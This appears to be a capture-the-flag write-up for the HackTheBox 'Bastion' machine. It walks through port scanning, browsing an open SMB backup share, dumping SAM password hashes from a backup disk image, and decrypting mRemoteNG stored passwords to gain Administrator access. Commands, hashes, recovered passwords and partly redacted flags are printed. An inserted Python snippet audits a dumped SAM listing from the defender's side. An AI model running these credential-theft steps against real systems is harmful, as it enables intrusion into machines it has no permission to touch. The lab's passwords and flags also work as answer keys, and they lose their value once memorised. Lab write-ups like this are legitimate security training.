Hackthebox – Bastion

Low-privilege (user) access

The first step I always take in my analysis is to perform some port scans: TCP (all ports), UDP (top 20) and an nmap -A scan. Below is the output of the TCP all-ports scan.

# Nmap 7.70 scan initiated Sat Jul 13 05:57:11 2019 as: nmap -sT -p 1-65535 -oN fullscan_tcp 10.10.10.134
Strange read error from 10.10.10.134 (71 - 'Protocol error')
Nmap scan report for 10.10.10.134
Host is up (0.016s latency).
Not shown: 65521 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5985/tcp  open  wsman
40860/tcp open  unknown
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown

# Nmap done at Sat Jul 13 05:57:27 2019 -- 1 IP address (1 host up) scanned in 15.68 seconds

The things that immediately stood out, knowing this is a Windows host, are the SSH port (22) and the two ports for (after some research) PowerShell remote access (5985 and 47001). Both require credentials, however, so some additional enumeration is needed before gaining access. Therefore the next step is to see whether any shares are available using smbclient.

root@kalivm:~/Bastion# smbclient -L \\10.10.10.134 -N

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	Backups         Disk      
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.134 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available

The smbclient tool reveals that the Backups share could be interesting, and after connecting to it with smbclient, it turned out to be browsable without credentials.

root@kalivm:~/Bastion# smbclient \\\\10.10.10.134\\Backups
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jul 13 06:59:37 2019
  ..                                  D        0  Sat Jul 13 06:59:37 2019
  note.txt                           AR      116  Tue Apr 16 12:10:09 2019
  SDT65CB.tmp                         A        0  Fri Feb 22 13:43:08 2019
  WindowsImageBackup                  D        0  Fri Feb 22 13:44:02 2019

		7735807 blocks of size 4096. 2787119 blocks available

After some browsing through the Backups share, I found a Virtual Hard Disk (.vhd) file which seemed to be a backup of L4mpje’s computer. Some additional googling led me to an article about remotely mounting the .vhd file. Seeing the screenshots gave me a perfectly clear picture that this had also been performed on this same target.

Through the courses I followed on forensic investigations, I knew immediately that the first thing to analyze would be the SAM password database. Opening the SAM database, which is located in c:\windows\System32\config\, can easily be done using samdump2:

root@kalivm:~/Bastion/l4mpje-backup/Windows/System32/config# samdump2 SYSTEM SAM
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

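A small defender-side check over a samdump2 (pwdump-format) listing like the one above: which accounts in the leaked backup are enabled, whether any carry the well-known empty-password NT hash, and whether a legacy LM hash is stored. This is an added example, not part of the original writeup; the sample dump is constructed from the listing above, with the user account's NT hash replaced by a placeholder.

```python
import re
from dataclasses import dataclass

# Well-known hashes of the empty password (from the LM and NT algorithms).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample in samdump2's pwdump layout; the user's NT hash is a placeholder.
SAMPLE_DUMP = """\
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000000:::
"""

# One pwdump record: optional "*disabled*" flag, then user:rid:lmhash:nthash:::
_LINE = re.compile(r"^(?P<flag>\*disabled\*\s+)?(?P<user>[^:]+):(?P<rid>\d+):"
                   r"(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$")

@dataclass
class SamAccount:
    user: str
    rid: int
    lm_hash: str
    nt_hash: str
    disabled: bool

def parse_samdump(text):
    """Parse samdump2 output; lines that are not pwdump records are skipped."""
    accounts = []
    for raw in text.splitlines():
        m = _LINE.match(raw.strip())
        if m:
            accounts.append(SamAccount(m["user"], int(m["rid"]), m["lm"].lower(),
                                       m["nt"].lower(), m["flag"] is not None))
    return accounts

def assess(accounts):
    """Defender's view of a leaked SAM: which enabled accounts are now exposed."""
    findings = []
    for a in accounts:
        if a.disabled:
            continue  # a disabled account cannot be used to log in
        if a.nt_hash == EMPTY_NT:
            findings.append(f"{a.user} (RID {a.rid}): enabled with an empty password")
        else:
            findings.append(f"{a.user} (RID {a.rid}): enabled, NT hash exposed; rotate it")
        if a.lm_hash != EMPTY_LM:
            findings.append(f"{a.user} (RID {a.rid}): weak LM hash stored")
    return findings
```

Run against the Bastion listing, the only finding is the enabled L4mpje account, which is exactly the credential the backup share handed out.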
Cracking the password was not required: by looking up the located password hash on hashkiller, I was able to find the actual password, which allowed me to log in through SSH.

root@kalivm:~/Bastion# ssh L4mpje@10.10.10.134
L4mpje@10.10.10.134's password: 

Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

l4mpje@BASTION C:\Users\L4mpje>cd Desktop

l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt
9bfe57d5c33<noflag>1772f9d86c6cd

Privilege Escalation (Administrator access)

To escalate privileges, various long how-to guides have been written and I will not describe all the steps mentioned there, just the relevant steps for this target. The first thing I did was to determine whether any specific software packages were installed, in either the ‘Program Files’ or the ‘Program Files (x86)’ directory.

l4mpje@BASTION C:\Users\L4mpje>dir "c:\Program Files"
 Volume in drive C has no label.
 Volume Serial Number is 0CB3-C487

 Directory of c:\Program Files

16-04-2019  12:18    <dir>          .
16-04-2019  12:18    <dir>          ..
16-04-2019  12:18    <dir>          Common Files
23-02-2019  10:38    <dir>          Internet Explorer
22-02-2019  15:19    <dir>          OpenSSH-Win64
22-02-2019  15:08    <dir>          PackageManagement
16-04-2019  12:18    <dir>          VMware
23-02-2019  11:22    <dir>          Windows Defender
23-02-2019  10:38    <dir>          Windows Mail
23-02-2019  11:22    <dir>          Windows Media Player
16-07-2016  15:23    <dir>          Windows Multimedia Platform
16-07-2016  15:23    <dir>          Windows NT
23-02-2019  11:22    <dir>          Windows Photo Viewer
16-07-2016  15:23    <dir>          Windows Portable Devices
22-02-2019  15:08    <dir>          WindowsPowerShell
               0 File(s)              0 bytes
              15 Dir(s)  11.415.777.280 bytes free

l4mpje@BASTION C:\Users\L4mpje>dir "c:\Program Files (x86)"
 Volume in drive C has no label.
 Volume Serial Number is 0CB3-C487

 Directory of c:\Program Files (x86)

22-02-2019  15:01    <dir>          .
22-02-2019  15:01    <dir>          ..
16-07-2016  15:23    <dir>          Common Files
23-02-2019  10:38    <dir>          Internet Explorer
16-07-2016  15:23    <dir>          Microsoft.NET
22-02-2019  15:01    <dir>          mRemoteNG
23-02-2019  11:22    <dir>          Windows Defender
23-02-2019  10:38    <dir>          Windows Mail
23-02-2019  11:22    <dir>          Windows Media Player
16-07-2016  15:23    <dir>          Windows Multimedia Platform
16-07-2016  15:23    <dir>          Windows NT
23-02-2019  11:22    <dir>          Windows Photo Viewer
16-07-2016  15:23    <dir>          Windows Portable Devices
16-07-2016  15:23    <dir>          WindowsPowerShell
               0 File(s)              0 bytes
              14 Dir(s)  11.424.575.488 bytes free

The interesting additionally installed packages were the OpenSSH-Win64 package, which is required for the SSH/PowerShell combination as used, VMware and mRemoteNG. Some research led me to an article about insecure password storage issues with mRemoteNG. Following this article and doing some additional searching pointed me to a nice Python script that could help in decoding the password.

root@kalivm:~/Bastion/mremoteng-decrypt# python mremoteng_decrypt.py -s "yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB"
Password: bureaulampje
root@kalivm:~/Bastion/mremoteng-decrypt# python mremoteng_decrypt.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Password: thXLHM96BeKL0ER2

After decoding the password, logging in as Administrator and grabbing the root flag was easy.

root@kalivm:~/Bastion# ssh Administrator@10.10.10.134
Administrator@10.10.10.134's password: 

Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

administrator@BASTION C:\Users\Administrator>type Desktop\root.txt
958850b9181<noflag>20a9c430e65c8
